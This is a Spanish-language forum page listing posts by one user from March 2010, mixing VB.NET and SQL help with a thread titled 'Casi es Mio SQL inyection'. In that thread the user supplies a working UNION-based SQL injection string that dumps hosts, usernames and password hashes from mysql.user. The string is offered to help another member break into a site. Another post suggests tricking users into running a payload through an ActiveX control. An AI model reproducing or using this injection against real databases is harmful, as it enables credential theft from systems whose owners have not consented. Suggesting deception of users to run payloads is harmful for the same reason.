Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3282
Código (vbnet) [Seleccionar]
Dim cmd As New SqlCommand

Public Function InsertarDatos(ByVal ClaveAlumno As String, ByVal Nombre As String) As String
   cmd = New SqlCommand("Nombre_Procedimiento", cnn)
   cmd.CommandType = CommandType.StoredProcedure
   cmd.Parameters.Add("@ClaveAlumno", SqlDbType.Varchar)
   cmd.Parameters.Add("@Nombre", SqlDbType.Varchar)
   Try
      cmd.ExecuteNonQuery()
      Return "Ejecutado Correctamente!"
   Catch
      Return "Error!"
   End Try
End Function
#3283
Pues si lo que te interesa es solo ejecutar el Payload a modo de prueba, pues puedes hacerlo desde el mismo windows! De lo contrario, existen formas de engañar al usuario, por ejemplo un ActiveX Control!
#3284
Bases de Datos / Re: Ayuda con sentencia sql
23 Marzo 2010, 17:16 PM
Es posible, pero es mejor usar Store Procedure!

Consulta sobre funciones como... MAX(), COUNT(), INNER JOIN, DESC, ASC.
#3285
xD. Pero sin maquinas virtuales o fisicas, es decir, son 2 particiones y en cada una de ellas tenes los O.S's o dentro de una maquina virtual instalaste los 2 S.O's. Puedes tener los 2 S.O's activos al mismo tiempo? de lo contrario no podras usarlos como hacklab xD
#3286
Nivel Web / Re: Casi es Mio SQL inyection
23 Marzo 2010, 02:26 AM
mmm ya sé cual es él problema... Mira lo que pasa esque la version de MySQL debe ser >= 5 para que tenga information_schema de lo contrario no podras usarlo.
#3287
Nivel Web / Re: Casi es Mio SQL inyection
23 Marzo 2010, 00:39 AM
Que error?
#3288
Nivel Web / Re: Casi es Mio SQL inyection
23 Marzo 2010, 00:11 AM
Intentad así:
Código (sql) [Seleccionar]
id=-1+union+all+select+1,group_concat(host,0x3a,user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.user--
#3289
Nivel Web / Re: Casi es Mio SQL inyection
22 Marzo 2010, 23:43 PM
Haz mirado tutorial de iSQL?
#3290
Nivel Web / Re: Casi es Mio SQL inyection
22 Marzo 2010, 23:34 PM
What The Fuck!